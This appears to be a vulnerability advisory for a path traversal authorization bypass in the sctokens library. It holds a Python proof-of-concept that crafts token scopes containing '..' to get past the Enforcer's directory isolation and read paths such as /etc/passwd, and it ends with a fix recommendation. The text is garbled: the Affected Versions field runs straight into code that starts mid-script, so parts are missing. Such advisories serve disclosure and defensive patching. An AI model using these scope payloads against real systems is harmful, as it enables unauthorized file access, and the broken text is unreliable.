# Vulnerability Summary: Path Traversal in sctokens Leading to Authorization Bypass ## Vulnerability Overview **CVE ID**: CVE-2025-23227 **Severity**: High (8.1/10) **Affected Versions**: "/home" # urllibs.normalize_path("/home/user2") -> "/home/user2" # Since "/home/user2".startswith("/home/") is True, authorization is granted print("\nTesting authorization...") is_authorized = enforcer.test(token, "read", requested_path) print(f"Is authorized: {is_authorized}") if is_authorized: print("\n[VULNERABILITY CONFIRMED]") print(f"The Enforcer ALLOWED access to {requested_path}") print(f"Even though the scope was nominally restricted to /home/user1/..") print("This bypasses the intended directory isolation.") else: print("\n[VULNERABILITY NOT REPRODUCED]") print("The Enforcer blocked the access attempt.") # Second example: root directory traversal print("\n--- Example 2: Root Traversal ---") token['scope'] = "read:/anything/.." # Resolves to / requested_path = "/etc/passwd" # or any sensitive path print(f"Token scope: {token['scope']}") print(f"Requested path: {requested_path}") is_authorized = enforcer.test(token, "read", requested_path) print(f"Is authorized: {is_authorized}") if is_authorized: print("[VULNERABILITY CONFIRMED] Root traversal allowed access to ALL paths!") if __name__ == "__main__": test_path_traversal_bypass() ``` --- ## Fix Solution Validate that the path in the scope does not contain `..` components after decoding but before normalization. Also ensure that any errors thrown during the validation process are subclasses of `ValidationFailure`, so that the Enforcer.test method handles them correctly.